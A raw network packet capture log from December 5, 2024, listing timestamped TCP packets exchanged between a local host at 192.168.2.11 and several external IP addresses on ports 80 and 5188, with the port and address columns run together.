                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.996012926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.996181965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.996217966 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.997543097 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.997584105 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.997999907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.999438047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.999473095 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.999494076 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.999519110 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.001019001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.001060009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.001323938 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.001358032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.002441883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.002863884 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.002912045 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.004004955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.004050970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.004120111 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.004156113 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.005654097 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.005702019 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.005743980 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.007237911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.007320881 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.007360935 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.007416010 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.008842945 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.008897066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.009152889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.009200096 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.010464907 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.010540962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.010586977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.012115002 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.012156963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.012159109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.012190104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.013827085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.014064074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.014106989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.015280008 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.015321970 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.015357018 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.015388012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.016904116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.016949892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.017077923 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.017117023 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.018517971 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.018646955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.018707991 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.020122051 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.020174026 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.020351887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.020391941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.021802902 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.021850109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.021909952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.023307085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.023367882 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.023544073 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.023586035 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.025005102 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.025053978 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.025118113 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.025161982 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.026540995 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.026674986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.026719093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.028197050 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.028239012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.028522968 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.028561115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.029774904 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.030303955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.030348063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.031445026 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.031491041 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.031507969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.031541109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.033054113 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.033102036 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.033325911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.033370972 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.034657001 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.035372019 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.035425901 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.036391020 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.036402941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.036429882 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.036458015 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.037858963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.038671970 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.038729906 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.039496899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.039545059 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.040209055 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.040252924 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.041069984 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.041121006 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.041239977 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.041273117 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.042763948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.042850018 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.042895079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.043165922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.043200016 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.043776035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.043833971 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.043850899 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.044238091 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.044285059 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.044342041 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.044859886 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.045161009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.045797110 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.046073914 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.046145916 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.047163963 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.047216892 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.047256947 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.048523903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.048593044 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.048732996 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.048772097 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.049767017 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.049892902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.049947023 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.050681114 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.050962925 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.051032066 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.051687956 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.051980019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.052037001 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.053019047 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.053030968 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.053113937 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.054006100 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.055085897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.055156946 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.055166960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.055181026 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.055222988 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.056288958 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.057425976 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.057437897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.057496071 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.057545900 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.057811975 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.058578968 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.058590889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.058639050 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.059639931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.059770107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.059820890 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.060772896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.061323881 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.061377048 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.061924934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.062055111 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.062112093 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.063098907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.063330889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.063755035 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.064224005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.064666986 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.064707041 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.066174984 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.066366911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.066462040 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.066780090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.066978931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.067055941 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.068003893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.068257093 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.068778992 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.068959951 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.069185972 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.069267035 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.070106983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.070276022 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.070322037 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.071084976 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.071584940 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.072309971 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.072362900 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.072386980 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.072892904 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.073322058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.073520899 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.074655056 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.074727058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.074753046 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.074901104 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.075625896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.075829983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.075875044 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.076693058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.076896906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.076946974 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.077651024 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.077733994 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.077884912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.078006983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.078141928 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.078625917 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.078682899 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.079144001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.079559088 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.079648972 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.080300093 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.080312014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.080355883 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.081264019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.081367970 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.082397938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.082465887 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.082510948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.083302975 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.083623886 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.083779097 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.084675074 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.084764004 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.085026979 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.085947990 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.086014032 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.086138964 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.086994886 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.087022066 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.087069035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.087771893 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.088182926 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.088423014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.089278936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.089323044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.089324951 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.089373112 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.090388060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.090498924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.090562105 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.091550112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.091711044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.091825962 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.092629910 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.093170881 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.094002008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.094048977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.094068050 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.094167948 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.094932079 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.095076084 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.095148087 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.096066952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.096242905 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.096297979 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.097230911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.097815037 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.097899914 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.098381996 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.098834038 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.099348068 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.099534988 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.099554062 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.099611044 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.100630999 CET51884979292.255.85.66192.168.2.11
